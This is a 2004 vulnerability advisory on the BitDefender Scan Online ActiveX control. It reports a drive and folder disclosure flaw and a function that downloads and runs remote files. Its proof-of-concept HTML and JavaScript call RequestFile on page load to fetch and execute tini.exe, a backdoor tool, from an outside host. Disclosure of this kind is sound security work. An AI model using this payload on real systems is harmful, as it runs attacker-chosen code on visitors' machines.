~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application: BitDefender Scan Online(ActiveX) Vendors: http://www.bitdefender.com/scan/Msie/index.php Platforms: Windows Bug: Remote File Download & Execute & Private Information Disclosure Risk: High - Running Arbitary Code Exploitation: Remote with browser Date: 19 Apr 2004 Author: Rafel Ivgi, The-Insider e-mail: the_insider@mail.com web: http://theinsider.deep-ice.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1) Introduction 2) Bugs 3) The Code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============== 1) Introduction =============== This is a quote of BitDefender Scan Online Description: "BitDefender Scan Online is a fully functional antivirus product, with a web-based interface and featuring all required elements for remotely antivirus scanning and cleaning: it scans system's memory, all files, folders and drives' boot sector, providing the user with the option to automatically clean the infected files. This is a quote of the page title: "BitDefender AntiVirus - Data Security, AntiVirus Software, Free Protection". The meaning of this sentence is very far from reality. I believe this to be a ridiculous that an AntiVirus will deliver and execute a virus on my system. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ====== 2) Bug ====== "BitDefender Scan Online" downloads its components and registered the following COM/ActiveX Object: "AVXSCANONLINE.AvxScanOnlineCtrl.1" With the following CLSID: 80DD2229-B8E4-4C77-B72F-F22972D723EA "BitDefender Scan Online" has confusing protection, all properties and functions cannot be set/accessed by the : object = new ActiveXObject("AVXSCANONLINE.AvxScanOnlineCtrl.1") It can only be set/accessed using(html object tag created object): "<OBJECT id=mymy codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0, 1 hspace=0 vspace=0 align="top" classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA width=405 height=180>" ---------------------------------------------------------------------------- -------------------------------------------------- "BitDefender Scan Online" Disclosures the users information, allowing a remote user to see all drives and folders of the system using this simple code: ------------------- CUT HERE ------------------- <OBJECT id=seemycomputer codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0, 1 hspace=0 vspace=0 align="top" classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA width=405 height=180> <PARAM NAME="_ExtentX" VALUE="6614"> <PARAM NAME="_ExtentY" VALUE="4498"> <PARAM NAME="_StockProps" VALUE="9"> <PARAM NAME="ForeColor" VALUE="0"> <PARAM NAME="BackColor" VALUE="16777215"></OBJECT> ------------------- CUT HERE ------------------- ---------------------------------------------------------------------------- -------------------------------------------------- "BitDefender Scan Online" contains a function that will ***DOWNLOAD A REMOTE FILE AND WILL EXECUTE IT ON THE SYSTEM*** For Example: object.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\";); ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =========== 3) The Code =========== This is Proof Of Concept Code: ------------------- CUT HERE ------------------- <OBJECT id=mymy codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0, 1 hspace=0 vspace=0 align="top" classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA width=405 height=180> <PARAM NAME="Id" VALUE="Trusted"> <PARAM NAME="_ExtentX" VALUE="6614"> <PARAM NAME="_ExtentY" VALUE="4498"> <PARAM NAME="_StockProps" VALUE="9"> <PARAM NAME="ForeColor" VALUE="0"> <PARAM NAME="BackColor" VALUE="16777215"></object> <script> var a; function cool() { mymy.Update(); mymy.Updating(1); mymy.SetCountry("Israel"); mymy.EnableRtvr(1); mymy.SetupMode = true; mymy.RequestFile("http://ntsecurity.nu/downloads/tini.exe","c:\\";); } setTimeout("cool()", 1500); </script> ------------------- CUT HERE ------------------- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --- Rafel Ivgi, The-Insider http://theinsider.deep-ice.com "Only the one who sees the invisible , Can do the Impossible."
